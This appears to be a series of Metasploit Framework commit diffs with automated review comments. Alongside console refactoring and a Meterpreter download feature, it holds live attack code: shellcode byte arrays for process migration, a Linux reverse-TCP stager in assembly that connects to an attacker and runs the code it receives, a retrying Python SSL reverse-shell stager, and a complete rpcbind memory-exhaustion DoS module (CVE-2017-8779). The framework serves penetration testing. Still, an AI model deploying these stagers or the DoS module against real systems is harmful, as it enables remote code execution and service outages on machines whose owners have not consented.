"\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C\x24";
"\x58\x83\xC0\x2B\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00"
"\x89\x02\xE8\x0F\x00\x00\x00\x66\x8C\xD8\x66\x8E\xD0\x83\xC4\x14"
"\x5F\x5E\x5D\xC2\x08\x00\x8B\x3C\xE4\xFF\x2A\x48\x31\xC0\x57\xFF"
"\xD6\x5F\x50\xC7\x44\x24\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C"
"\x24";
// see '/msf3/external/source/shellcode/x64/migrate/remotethread.asm'
BYTE migrate_wownativex[] = "\xFC\x48\x89\xCE\x48\x89\xE7\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00"
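Review bot: the offset changes in the new blob are consistent with the six inserted bytes `\x66\x8C\xD8\x66\x8E\xD0` (`mov ax, ds` / `mov ss, ax` with 16-bit operand prefixes): `\x83\xC0\x25` became `\x83\xC0\x2B` and `\xE8\x09\x00\x00\x00` became `\xE8\x0F\x00\x00\x00`, both +6. One byte deserves a second look: `mov edi, [esp]` was `\x8B\x3C\x24` and is now `\x8B\x3C\xE4`. Both SIB bytes have base=esp and index=none, and the scale bits are ignored when there is no index, so they decode to the same operand, but the different encoding suggests a different assembler and it is worth confirming on a live target that the blob matches the .asm in this commit.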

View File

@ -137,7 +137,7 @@ module Metasploit
end
def get_string(data,length)
data.slice!(0,length).gsub(/\x00/,'')
data.slice!(0,length).force_encoding("UTF-8").gsub(/\x00/,'')
end
def uac_string
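Review bot: `force_encoding("UTF-8")` only relabels the bytes, so if the slice is not valid UTF-8 the following `gsub` raises ArgumentError ("invalid byte sequence in UTF-8"), which the previous binary-encoded version never did. Either `scrub` the string before the `gsub`, or decode from the record's actual source encoding (`encode("UTF-8", invalid: :replace, undef: :replace)`) and then strip NULs with `delete("\0")`. Note also that `force_encoding` mutates the sliced string in place; harmless here since `slice!` already returned a fresh string, but worth a comment.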

View File

@ -50,11 +50,13 @@ module Metasploit
def pull_batch
if channel.cid.nil?
dlog("NTDS Parser Channel was closed, reopening")
reopen_channel
end
begin
raw_batch_data = channel.read(BATCH_SIZE)
rescue EOFError
rescue EOFError => e
elog("NTDS Parser: Error pulling batch - #{e}")
raw_batch_data = nil
end
raw_batch_data
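Review bot: logging the EOFError with `elog` will emit an error-level entry every time the channel reaches end of data, but returning `raw_batch_data = nil` here is how the caller learns the parse is complete, so this looks like normal termination rather than a failure. Use `dlog`/`vlog` for the expected EOF, or distinguish the case where the channel was closed and reopened (the `channel.cid.nil?` branch above) from a clean end of stream.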

View File

@ -91,49 +91,61 @@ module Payload::Linux::ReverseTcp
encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
asm = %Q^
xor ebx, ebx
mul ebx
push ebx
inc ebx
push ebx
push 0x2
mov al, 0x66
mov ecx, esp
int 0x80 ; sys_socketcall (socket())
xor ebx, ebx
mul ebx
push ebx
inc ebx
push ebx
push 0x2
mov al, 0x66
mov ecx, esp
int 0x80 ; sys_socketcall (socket())
test eax, eax
js failed
xchg eax, edi ; store the socket in edi
pop ebx ; set ebx back to zero
push #{encoded_host}
push #{encoded_port}
mov ecx, esp
push 0x66
pop eax
push eax
push ecx
push edi
mov ecx, esp
inc ebx
int 0x80 ; sys_socketcall (connect())
xchg eax, edi ; store the socket in edi
pop ebx ; set ebx back to zero
push #{encoded_host}
push #{encoded_port}
mov ecx, esp
push 0x66
pop eax
push eax
push ecx
push edi
mov ecx, esp
inc ebx
int 0x80 ; sys_socketcall (connect())
test eax, eax
js failed
^
asm << asm_send_uuid if include_send_uuid
asm << %Q^
mov dl, 0x7
mov ecx, 0x1000
mov ebx, esp
shr ebx, 0xc
shl ebx, 0xc
mov al, 0x7d
int 0x80 ; sys_mprotect
mov dl, 0x7
mov ecx, 0x1000
mov ebx, esp
shr ebx, 0xc
shl ebx, 0xc
mov al, 0x7d
int 0x80 ; sys_mprotect
test eax, eax
js failed
pop ebx
mov ecx, esp
cdq
mov dh, 0xc
mov al, 0x3
int 0x80 ; sys_read (recv())
jmp ecx
pop ebx
mov ecx, esp
cdq
mov dh, 0xc
mov al, 0x3
int 0x80 ; sys_read (recv())
test eax, eax
js failed
jmp ecx
failed:
mov eax, 0x1
mov ebx, 0x1 ; set exit status to 1
int 0x80 ; sys_exit
^
asm
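Review bot: the comment `pop ebx ; set ebx back to zero` is wrong and was carried over into the reindented block: the value popped is the `push 0x2` left over from the socket() argument block, so `ebx` becomes 2 and the following `inc ebx` turns it into 3 (SYS_CONNECT for socketcall). The code works, but the comment should say so, since a reader who believes `ebx` is zero will miscount the later `inc ebx`. The added `test eax, eax` / `js failed` checks are sound on i386 Linux, where a failed syscall leaves `-errno` in eax. If stager size matters, the two 5-byte `mov eax, 0x1` / `mov ebx, 0x1` under `failed:` can be `push 0x1` / `pop eax` / `mov ebx, eax` (5 bytes instead of 10).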
@ -142,4 +154,3 @@ module Payload::Linux::ReverseTcp
end
end

View File

@ -32,7 +32,7 @@ module Payload::Python::ReverseTcp
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['StagerRetryCount'],
retry_wait: datastore['StagerRetryWait'],
retry_wait: datastore['StagerRetryWait']
}
generate_reverse_tcp(conf)

View File

@ -15,6 +15,13 @@ module Payload::Python::ReverseTcpSsl
include Msf::Payload::Python
include Msf::Payload::Python::ReverseTcp
def initialize(*args)
super
register_advanced_options([
OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]),
OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5])
], self.class)
end
#
# Generate the first stage
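Review bot: these two `register_advanced_options` entries may duplicate options already owned by `Msf::Payload::Python::ReverseTcp`, which is included on the line above and, per its hunk in this same commit, reads `datastore['StagerRetryCount']` and `datastore['StagerRetryWait']`. If that mixin registers them in its own `initialize`, the `super` call here already registers them and this block can go; if it does not, move the definitions there so both stagers share one copy and one help text.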
@ -22,7 +29,9 @@ module Payload::Python::ReverseTcpSsl
def generate
conf = {
port: datastore['LPORT'],
host: datastore['LHOST']
host: datastore['LHOST'],
retry_count: datastore['StagerRetryCount'],
retry_wait: datastore['StagerRetryWait']
}
generate_reverse_tcp_ssl(conf)
@ -42,10 +51,29 @@ module Payload::Python::ReverseTcpSsl
def generate_reverse_tcp_ssl(opts={})
# Set up the socket
cmd = "import ssl,socket,struct\n"
cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
cmd << "s=ssl.wrap_socket(so)\n"
cmd = "import ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
if opts[:retry_wait].blank? # do not retry at all (old style)
cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
cmd << "s=ssl.wrap_socket(so)\n"
else
if opts[:retry_count] > 0
cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
else
cmd << "while 1:\n"
end
cmd << "\ttry:\n"
cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
cmd << "\t\ts=ssl.wrap_socket(so)\n"
cmd << "\t\tbreak\n"
cmd << "\texcept:\n"
if opts[:retry_wait].to_i <= 0
cmd << "\t\tpass\n" # retry immediately
else
cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting
end
end
cmd << py_send_uuid if include_send_uuid
cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
cmd << "d=s.recv(l)\n"
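Review bot: `opts[:retry_count] > 0` raises `NoMethodError` when `retry_count` is `nil`, which `generate_reverse_tcp_ssl(opts={})` allows whenever a caller sets `retry_wait` without `retry_count`; use `opts[:retry_count].to_i > 0`, matching the `.to_i` checks already used for `retry_wait`. Two smaller points in the same block: when the `for x in range(N)` loop exhausts its attempts without reaching `break`, the generated script falls through to `s.recv(4)` with `s` never assigned and dies with a `NameError`, so emit an explicit exit after the loop; and the bare `except:` also swallows `KeyboardInterrupt`/`SystemExit`, where `except Exception:` is the usual form.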

View File

@ -1,5 +1,5 @@
# -*- coding: binary -*-
require 'msf/ui/console/command_dispatcher/common'
module Msf
module Ui
module Console

View File

@ -0,0 +1,147 @@
# -*- coding: binary -*-
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
module Msf
module Ui
module Console
module CommandDispatcher
# These are functions that are used in two or more command dispatchers.
module Common
# Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+
#
# @note This modifies +host_ranges+ in place
#
# @param arg [String] The thing to turn into a RangeWalker
# @param host_ranges [Array] The array of ranges to append
# @param required [Boolean] Whether an empty +arg+ should be an error
# @return [Boolean] true if parsing was successful or false otherwise
def arg_host_range(arg, host_ranges, required=false)
if (!arg and required)
print_error("Missing required host argument")
return false
end
begin
rw = Rex::Socket::RangeWalker.new(arg)
rescue
print_error("Invalid host parameter, #{arg}.")
return false
end
if rw.valid?
host_ranges << rw
else
print_error("Invalid host parameter, #{arg}.")
return false
end
return true
end
#
# Parse +arg+ into an array of ports and append the result into +port_ranges+
#
# Returns true if parsing was successful or nil otherwise.
#
# NOTE: This modifies +port_ranges+
#
def arg_port_range(arg, port_ranges, required=false)
if (!arg and required)
print_error("Argument required for -p")
return
end
begin
port_ranges << Rex::Socket.portspec_to_portlist(arg)
rescue
print_error("Invalid port parameter, #{arg}.")
return
end
return true
end
#
# Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses
#
# This stores all the addresses to a temporary file and utilizes the
# <pre>file:/tmp/filename</pre> syntax to confer the addrs. +rhosts+
# should be an Array. NOTE: the temporary file is *not* deleted
# automatically.
#
def set_rhosts_from_addrs(rhosts)
if rhosts.empty?
print_status("The list is empty, cowardly refusing to set RHOSTS")
return
end
if active_module
mydatastore = active_module.datastore
else
# if there is no module in use set the list to the global variable
mydatastore = self.framework.datastore
end
if rhosts.length > 5
# Lots of hosts makes 'show options' wrap which is difficult to
# read, store to a temp file
rhosts_file = Rex::Quickfile.new("msf-db-rhosts-")
mydatastore['RHOSTS'] = 'file:'+rhosts_file.path
# create the output file and assign it to the RHOSTS variable
rhosts_file.write(rhosts.join("\n")+"\n")
rhosts_file.close
else
# For short lists, just set it directly
mydatastore['RHOSTS'] = rhosts.join(" ")
end
print_line "RHOSTS => #{mydatastore['RHOSTS']}"
print_line
end
def show_options(mod) # :nodoc:
mod_opt = Serializer::ReadableText.dump_options(mod, ' ')
print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
# If it's an exploit and a payload is defined, create it and
# display the payload's options
if (mod.exploit? and mod.datastore['PAYLOAD'])
p = framework.payloads.create(mod.datastore['PAYLOAD'])
if (!p)
print_error("Invalid payload defined: #{mod.datastore['PAYLOAD']}\n")
return
end
p.share_datastore(mod.datastore)
if (p)
p_opt = Serializer::ReadableText.dump_options(p, ' ')
print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0)
end
end
# Print the selected target
if (mod.exploit? and mod.target)
mod_targ = Serializer::ReadableText.dump_exploit_target(mod, ' ')
print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0)
end
# Print the selected action
if mod.kind_of?(Msf::Module::HasActions) && mod.action
mod_action = Serializer::ReadableText.dump_module_action(mod, ' ')
print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0)
end
# Uncomment this line if u want target like msf2 format
#print("\nTarget: #{mod.target.name}\n\n")
end
end
end
end
end
end
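Review bot: the two sibling helpers use different failure values: `arg_host_range` returns `false` and documents `@return [Boolean]`, while `arg_port_range` returns bare `nil` and documents "true or nil". Since both were moved here verbatim from the `Db` and `Creds` dispatchers, this is the moment to make them consistent (return `false`, document it). In `show_options`, the `if (p)` that follows the `return` on `!p` is always true and can be dropped. The comment in `set_rhosts_from_addrs` acknowledges that the `Rex::Quickfile` holding the target list under /tmp is never deleted; now that the helper is shared by several dispatchers, it is worth deciding who removes it.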

View File

@ -3,7 +3,6 @@
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
require 'msf/ui/console/command_dispatcher/db_common'
module Msf
module Ui
@ -15,7 +14,7 @@ class Creds
include Msf::Ui::Console::CommandDispatcher
include Metasploit::Credential::Creation
include Msf::Ui::Console::CommandDispatcher::DbCommon
include Msf::Ui::Console::CommandDispatcher::Common
#
# The dispatcher's name.
@ -53,39 +52,6 @@ class Creds
true
end
#
# Miscellaneous option helpers
#
# Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+
#
# @note This modifies +host_ranges+ in place
#
# @param arg [String] The thing to turn into a RangeWalker
# @param host_ranges [Array] The array of ranges to append
# @param required [Boolean] Whether an empty +arg+ should be an error
# @return [Boolean] true if parsing was successful or false otherwise
def arg_host_range(arg, host_ranges, required=false)
if (!arg and required)
print_error("Missing required host argument")
return false
end
begin
rw = Rex::Socket::RangeWalker.new(arg)
rescue
print_error("Invalid host parameter, #{arg}.")
return false
end
if rw.valid?
host_ranges << rw
else
print_error("Invalid host parameter, #{arg}.")
return false
end
return true
end
#
# Can return return active or all, on a certain host or range, on a
# certain port or range, and/or on a service name.

View File

@ -3,7 +3,6 @@
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
require 'msf/ui/console/command_dispatcher/db_common'
module Msf
module Ui
@ -15,7 +14,7 @@ class Db
require 'tempfile'
include Msf::Ui::Console::CommandDispatcher
include Msf::Ui::Console::CommandDispatcher::DbCommon
include Msf::Ui::Console::CommandDispatcher::Common
#
# The dispatcher's name.
@ -1809,55 +1808,6 @@ class Db
# Miscellaneous option helpers
#
# Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+
#
# @note This modifies +host_ranges+ in place
#
# @param arg [String] The thing to turn into a RangeWalker
# @param host_ranges [Array] The array of ranges to append
# @param required [Boolean] Whether an empty +arg+ should be an error
# @return [Boolean] true if parsing was successful or false otherwise
def arg_host_range(arg, host_ranges, required=false)
if (!arg and required)
print_error("Missing required host argument")
return false
end
begin
rw = Rex::Socket::RangeWalker.new(arg)
rescue
print_error("Invalid host parameter, #{arg}.")
return false
end
if rw.valid?
host_ranges << rw
else
print_error("Invalid host parameter, #{arg}.")
return false
end
return true
end
#
# Parse +arg+ into an array of ports and append the result into +port_ranges+
#
# Returns true if parsing was successful or nil otherwise.
#
# NOTE: This modifies +port_ranges+
#
def arg_port_range(arg, port_ranges, required=false)
if (!arg and required)
print_error("Argument required for -p")
return
end
begin
port_ranges << Rex::Socket.portspec_to_portlist(arg)
rescue
print_error("Invalid port parameter, #{arg}.")
return
end
return true
end
#
# Takes +host_ranges+, an Array of RangeWalkers, and chunks it up into

View File

@ -1,57 +0,0 @@
# -*- coding: binary -*-
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
module Msf
module Ui
module Console
module CommandDispatcher
module DbCommon
#
# Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses
#
# This stores all the addresses to a temporary file and utilizes the
# <pre>file:/tmp/filename</pre> syntax to confer the addrs. +rhosts+
# should be an Array. NOTE: the temporary file is *not* deleted
# automatically.
#
def set_rhosts_from_addrs(rhosts)
if rhosts.empty?
print_status("The list is empty, cowardly refusing to set RHOSTS")
return
end
if active_module
mydatastore = active_module.datastore
else
# if there is no module in use set the list to the global variable
mydatastore = self.framework.datastore
end
if rhosts.length > 5
# Lots of hosts makes 'show options' wrap which is difficult to
# read, store to a temp file
rhosts_file = Rex::Quickfile.new("msf-db-rhosts-")
mydatastore['RHOSTS'] = 'file:'+rhosts_file.path
# create the output file and assign it to the RHOSTS variable
rhosts_file.write(rhosts.join("\n")+"\n")
rhosts_file.close
else
# For short lists, just set it directly
mydatastore['RHOSTS'] = rhosts.join(" ")
end
print_line "RHOSTS => #{mydatastore['RHOSTS']}"
print_line
end
end
end
end
end
end

View File

@ -16,6 +16,7 @@ module Msf
#
class Jobs
include Msf::Ui::Console::CommandDispatcher
include Msf::Ui::Console::CommandDispatcher::Common
@@handler_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner"],
@ -164,7 +165,7 @@ module Msf
job = framework.jobs[job_id.to_s]
mod = job.ctx[0]
output = '\n'
output = "\n"
output += "Name: #{mod.name}"
output += ", started at #{job.start_time}" if job.start_time
print_line(output)
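Review bot: the `'\n'` to `"\n"` change is a genuine behaviour fix (single-quoted Ruby strings do not interpret `\n`, so the job header was printed after a literal backslash-n), and nothing in the diff exercises it; a spec covering the job info output would keep the quoting from regressing.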

View File

@ -13,6 +13,7 @@ module Msf
class Modules
include Msf::Ui::Console::CommandDispatcher
include Msf::Ui::Console::CommandDispatcher::Common
# Constant for a retry timeout on using modules before they're loaded
CMD_USE_TIMEOUT = 3
@ -997,44 +998,6 @@ module Msf
show_module_set("Post", framework.post, regex, minrank, opts)
end
def show_options(mod) # :nodoc:
mod_opt = Serializer::ReadableText.dump_options(mod, ' ')
print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
# If it's an exploit and a payload is defined, create it and
# display the payload's options
if (mod.exploit? and mod.datastore['PAYLOAD'])
p = framework.payloads.create(mod.datastore['PAYLOAD'])
if (!p)
print_error("Invalid payload defined: #{mod.datastore['PAYLOAD']}\n")
return
end
p.share_datastore(mod.datastore)
if (p)
p_opt = Serializer::ReadableText.dump_options(p, ' ')
print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0)
end
end
# Print the selected target
if (mod.exploit? and mod.target)
mod_targ = Serializer::ReadableText.dump_exploit_target(mod, ' ')
print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0)
end
# Print the selected action
if mod.kind_of?(Msf::Module::HasActions) && mod.action
mod_action = Serializer::ReadableText.dump_module_action(mod, ' ')
print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0)
end
# Uncomment this line if u want target like msf2 format
#print("\nTarget: #{mod.target.name}\n\n")
end
def show_missing(mod) # :nodoc:
mod_opt = Serializer::ReadableText.dump_options(mod, ' ', true)
print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)

View File

@ -7,6 +7,7 @@ require 'rex/post/meterpreter/extensions/stdapi/stdapi'
require 'rex/post/meterpreter/extensions/stdapi/fs/io'
require 'rex/post/meterpreter/extensions/stdapi/fs/file_stat'
require 'fileutils'
require 'filesize'
module Rex
module Post
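Review bot: `require 'filesize'` introduces a new gem dependency for the Meterpreter stdapi client; the gemspec/Gemfile.lock change is not in the visible diff, so confirm it is declared in the same commit, otherwise this file fails at `require` time and takes every stdapi fs command with it.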
@ -25,6 +26,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
include Rex::Post::File
MIN_BLOCK_SIZE = 1024
class << self
attr_accessor :client
end
@ -312,7 +315,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
dest += timestamp
end
stat.call('downloading', src, dest) if (stat)
stat.call('Downloading', src, dest) if (stat)
result = download_file(dest, src, opts, &stat)
stat.call(result, src, dest) if (stat)
}
@ -325,8 +328,11 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
continue=false
tries=false
tries_no=0
stat ||= lambda { |a,b,c| }
if opts
continue = true if opts["continue"]
adaptive = true if opts['adaptive']
tries = true if opts["tries"]
tries_no = opts["tries_no"]
end
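Review bot: `adaptive` is only assigned inside `if opts`, unlike `continue`, `tries` and `tries_no`, which are initialised explicitly just above it; Ruby's parser makes the unassigned local `nil`, so the later `if adaptive && adjust_block` does not raise, but initialise `adaptive = false` next to the others so the intent is visible and the method does not rely on that quirk.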
@ -346,6 +352,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
dir = ::File.dirname(dest_file)
::FileUtils.mkdir_p(dir) if dir and not ::File.directory?(dir)
src_size = Filesize.new(src_stat.size).pretty
if continue
# continue downloading the file - skip downloaded part in the source
dst_fd = ::File.new(dest_file, "ab")
@ -353,10 +361,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
dst_fd.seek(0, ::IO::SEEK_END)
in_pos = dst_fd.pos
src_fd.seek(in_pos)
stat.call('continuing from ', in_pos, src_file) if (stat)
stat.call("Continuing from #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file)
rescue
# if we can't seek, download again
stat.call('error continuing - downloading from scratch', src_file, dest_file) if (stat)
stat.call('Error continuing - downloading from scratch', src_file, dest_file)
dst_fd.close
dst_fd = ::File.new(dest_file, "wb")
end
@ -365,10 +373,12 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
end
# Keep transferring until EOF is reached...
block_size = opts['block_size'] || 1024 * 1024
begin
if tries
# resume when timeouts encountered
seek_back = false
adjust_block = false
tries_cnt = 0
begin # while
begin # exception
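Review bot: `block_size = opts['block_size'] || 1024 * 1024` is evaluated outside the `if opts` guard used a few lines earlier, so a `nil` `opts` raises `NoMethodError` here; and because `0` is truthy in Ruby, a caller passing `0` (which is what `val.to_i` yields for a non-numeric `-b` value) ends up with `src_fd.read(0)` in the loop below, which can spin forever if an empty read returns `""` rather than `nil`. Clamp it with the constant introduced in this commit, e.g. `block_size = opts && opts['block_size'] ? [opts['block_size'].to_i, MIN_BLOCK_SIZE].max : 1024 * 1024`.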
@ -376,30 +386,46 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
in_pos = dst_fd.pos
src_fd.seek(in_pos)
seek_back = false
stat.call('resuming at ', in_pos, src_file) if (stat)
stat.call("Resuming at #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file)
else
# succesfully read and wrote - reset the counter
tries_cnt = 0
end
data = src_fd.read
adjust_block = true
data = src_fd.read(block_size)
adjust_block = false
rescue Rex::TimeoutError
# timeout encountered - either seek back and retry or quit
if (tries && (tries_no == 0 || tries_cnt < tries_no))
tries_cnt += 1
seek_back = true
stat.call('error downloading - retry #', tries_cnt, src_file) if (stat)
# try a smaller block size for the next round
if adaptive && adjust_block
block_size = [block_size >> 1, MIN_BLOCK_SIZE].max
adjust_block = false
msg = "Error downloading, block size set to #{block_size} - retry # #{tries_cnt}"
stat.call(msg, src_file, dest_file)
else
stat.call("Error downloading - retry # #{tries_cnt}", src_file, dest_file)
end
retry
else
stat.call('error downloading - giving up', src_file, dest_file) if (stat)
stat.call('Error downloading - giving up', src_file, dest_file)
raise
end
end
dst_fd.write(data) if (data != nil)
percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0
msg = "Downloaded #{Filesize.new(dst_fd.pos).pretty} of #{src_size} (#{percent.round(2)}%)"
stat.call(msg, src_file, dest_file)
end while (data != nil)
else
# do the simple copying quiting on the first error
while ((data = src_fd.read) != nil)
while ((data = src_fd.read(block_size)) != nil)
dst_fd.write(data)
percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0
msg = "Downloaded #{Filesize.new(dst_fd.pos).pretty} of #{src_size} (#{percent.round(2)}%)"
stat.call(msg, src_file, dest_file)
end
end
rescue EOFError
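Review bot: `percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0` divides by zero for an empty source file (`src_stat.size == 0`) and puts `NaN` in the progress message; guard on the size before computing the percentage. Also, the progress callback now fires on every block in both branches, and in the adaptive path the block can shrink to `MIN_BLOCK_SIZE` (1 KiB), which on a large file floods the console with one "Downloaded x of y" line per kilobyte; rate-limit the `stat.call`, for example only when the integer percentage changes.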

View File

@ -28,6 +28,8 @@ class Console::CommandDispatcher::Stdapi::Fs
@@download_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ],
"-c" => [ false, "Resume getting a partially-downloaded file." ],
"-a" => [ false, "Enable adaptive download buffer size." ],
"-b" => [ true, "Set the initial block size for the download." ],
"-l" => [ true, "Set the limit of retries (0 unlimits)." ],
"-r" => [ false, "Download recursively." ],
"-t" => [ false, "Timestamp downloaded files." ])
@ -382,6 +384,10 @@ class Console::CommandDispatcher::Stdapi::Fs
@@download_opts.parse(args) { |opt, idx, val|
case opt
when "-a"
opts['adaptive'] = true
when "-b"
opts['block_size'] = val.to_i
when "-r"
recursive = true
opts['recursive'] = true
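Review bot: `opts['block_size'] = val.to_i` accepts anything: a non-numeric or negative `-b` value silently becomes `0` or a negative size and is passed down unchecked. Validate at parse time (reject values below 1 with a `print_error` and return) and state the unit in the help text ("Set the initial block size for the download, in bytes"), since `-b 4` and `-b 4096` mean different things to users accustomed to KiB/MiB flags.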

View File

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Report
include Msf::Auxiliary::UDPScanner
def initialize(info={})
super(update_info(info,
'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',
'Description' => %q{
This module exploits a vulnerability in certain versions of
rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
large (and never freed) memory allocations for XDR strings on
the target.
},
'Author' =>
[
'guidovranken', # original code
'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2017-8779' ],
[ 'BID', '98325' ],
[ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
],
'Disclosure Date' => 'May 03 2017'))
register_options([
Opt::RPORT(111),
OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
])
end
def scan_host(ip)
pkt = [
0, # xid
0, # message type CALL
2, # RPC version 2
100000, # Program
4, # Program version
9, # Procedure
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Program: 0
0, # Ver
4, # Proc
4, # Argument length
datastore['ALLOCSIZE'] # Payload
].pack('N*')
s = udp_socket(ip, datastore['RPORT'])
count = 0
while count < datastore['COUNT'] do
begin
s.send(pkt, 0)
rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
vprint_error("Host #{ip} unreachable")
break
end
count += 1
end
vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
end
end
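Review bot: the closing `vprint_good("Completed #{count} loop(s) of allocating ... bytes on host ...")` claims an effect the module never observes: each iteration is a one-way UDP `send` with no response read, so it can only report that the packets were sent, not that the target allocated anything. Reword it to "sent N packets" so operators and report consumers do not read it as confirmation of the DoS. Related: `Msf::Auxiliary::Report` is included but nothing is reported, and `datastore['ALLOCSIZE']` is packed with `N` without a range check, so values above 2^32-1 wrap silently; give the `OptInt` an upper bound or validate it in `scan_host`.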

View File

@ -19,7 +19,12 @@ class MetasploitModule < Msf::Auxiliary
third party.
},
'Author' => [ 'xistence <xistence[at]0x90.nl>'], # Original scanner module
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-0987'],
['CVE', '2006-0988'],
]
)
register_options( [
@ -124,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary
:port => datastore['RPORT'],
:proto => 'udp', :name => "DNS",
:info => "DNS amplification - #{data.length} bytes [#{amp.round(2)}x Amplification]",
:refs => [ "CVE-2006-0987", "CVE-2006-0988" ])
:refs => self.references)
end
# If these flags are set, we get a valid response but recursion is not available
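Review bot: `:refs => self.references` changes the type handed to `report_vuln`: `references` yields `Msf::Module::Reference`/`SiteReference` objects, where the removed line passed plain `"CVE-2006-0987"` strings. Confirm the reporting layer normalises those objects rather than calling `to_s` on them, and note that any reference added to the module later, including the URL kind, now flows into the vuln record automatically.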

View File

@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-10073'], # validate, an instance of a described attack approach from the original reference
['URL', 'http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html']
]
))
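Review bot: the inline `# validate, ...` comment on `['CVE', '2016-10073']` is a TODO left in the merged reference list: either the CVE applies to the technique this module checks, in which case list it without the hedge, or it does not and it should be dropped. Reference entries feed reporting and search, so an unvalidated CVE misattributes every finding the module produces.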

View File

@ -26,6 +26,8 @@ class MetasploitModule < Msf::Auxiliary
],
'References' =>
[
['CVE', '2015-8103'], # see link and validate, https://highon.coffee/blog/jenkins-api-unauthenticated-rce-exploit/ states this is another issue
['URL', 'https://jenkins.io/security/advisory/2015-11-11/'],
['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'],
['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'],
],
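Review bot: the comment on `['CVE', '2015-8103']` itself says the linked write-up "states this is another issue", and it is: CVE-2015-8103 is the Jenkins CLI Java deserialisation vulnerability covered by the 2015-11-11 advisory, not the unauthenticated Script Console access the remaining references describe. Listing it here tags every Script Console finding with an unrelated CVE; drop the line (the advisory URL can stay) unless the module actually exercises the deserialisation issue.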

View File

@ -20,7 +20,12 @@ class MetasploitModule < Msf::Auxiliary
'Jay Turla <@shipcod3>' , #Cross-Site Tracing (XST) Checker
'CG' #HTTP TRACE Detection
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2005-3398'], # early case where this vector applied to a specific application.
